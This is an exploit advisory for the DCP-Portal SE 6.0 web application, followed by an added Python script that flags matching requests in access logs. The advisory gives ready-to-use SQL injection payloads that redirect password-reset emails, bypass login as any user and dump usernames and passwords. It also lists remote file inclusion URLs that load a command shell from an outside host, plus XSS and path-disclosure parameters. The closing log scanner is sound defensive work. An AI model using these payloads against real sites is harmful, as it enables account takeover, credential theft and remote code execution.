Hello,

DCP-Portal SE 6.0 multiple injections

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

SQL injections
if magic_quotes_gpc = off
/*************************************/

lostpassword.php

You can receive the reset password email at your own address for any user you want :)
Change youremail@yourserver.com to your real email.
Example:
-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*

and you will receive the reset password email for all the members of this website.

If you want to receive the password for a specific user ID, for example uid=1 (or change 1 to the user ID):

-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*

---------------------------
login
Try the user name as
' or uid=1/*

or change the uid value to that of any user you want to log in as.
---------------------------
file calendar.php
SQL injection by POST method, try this form :)

---------------------------
file search.php

Try one of these, because the number of columns changes from one section to another :)
If you searched for (content,news,link,forum)
use
xx%') union select uid,username,password from dcp5_members/*

If you searched for (doc,anns)
use
xx%') union select uid,username,password,password from dcp5_members/*
/*************************************/

Remote file inclusion
library/lib.php?root=http://www.soqor.net/tools/cmd.txt?
library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?

/*************************************/

Full path
library/editor/editor.php
library/lib.php

/*************************************/

XSS
admin/inc/footer.inc.php?root_url="><"
admin/inc/footer.inc.php?dcp_version=

admin/inc/header.inc.php?root_url="><"
admin/inc/header.inc.php?page_top_name=
admin/inc/header.inc.php?page_name=
admin/inc/header.inc.php?page_options=

/*************************************/
WwW.SoQoR.NeT
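
Added example, not part of the original advisory and not DCP-Portal code: a log triage script that flags the request shapes listed above (a remote URL in "root", markup characters sent to the admin include fragments, UNION SELECT in a query string, and direct requests to the include files). The log lines, hosts, index.php and the "q" parameter are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory lists under remote file inclusion and full path.
INCLUDE_SCRIPTS = ("library/lib.php", "library/editor/editor.php")
# Admin fragments the advisory lists under XSS.
ADMIN_FRAGMENTS = ("admin/inc/header.inc.php", "admin/inc/footer.inc.php")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"union\s+select", re.I)
REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.I)

def classify(log_line):
    """Return the advisory categories that one access-log line matches."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return set()
    url = urlsplit(m.group(1))
    path = url.path.lstrip("/")
    hits = set()
    # parse_qsl percent-decodes, so encoded payloads are matched too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if path.endswith(INCLUDE_SCRIPTS) and name == "root" and REMOTE_RE.match(value):
            hits.add("remote-file-include")
        if path.endswith(ADMIN_FRAGMENTS) and re.search(r'[<>"]', value):
            hits.add("xss")
        if UNION_RE.search(value):
            hits.add("sql-injection")
    # Assumption: include files are never requested directly in normal use.
    if not hits and path.endswith(INCLUDE_SCRIPTS + ADMIN_FRAGMENTS):
        hits.add("direct-include-request")
    return hits

# Constructed sample lines (hosts, addresses, index.php and "q" are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /library/lib.php?root=http://files.example.test/a.txt? HTTP/1.1" 200 90',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /admin/inc/header.inc.php?root_url=%22%3E%3Cb%3E HTTP/1.1" 200 300',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=xx%25%27)+union+select+1,2,3/* HTTP/1.1" 200 700',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /library/editor/editor.php HTTP/1.1" 200 120',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=student+union+elections HTTP/1.1" 200 640',
]

def scan(lines):
    """Return (line_number, sorted categories) for every suspicious line."""
    return [(i, sorted(c)) for i, line in enumerate(lines, 1) if (c := classify(line))]

if __name__ == "__main__":
    for lineno, cats in scan(SAMPLE_LOG):
        print(lineno, ", ".join(cats))
```

Access logs record only the request line, so the calendar.php injection sent by POST, and any other payload carried in a request body, will not show up here and needs request-body logging or a WAF rule to catch.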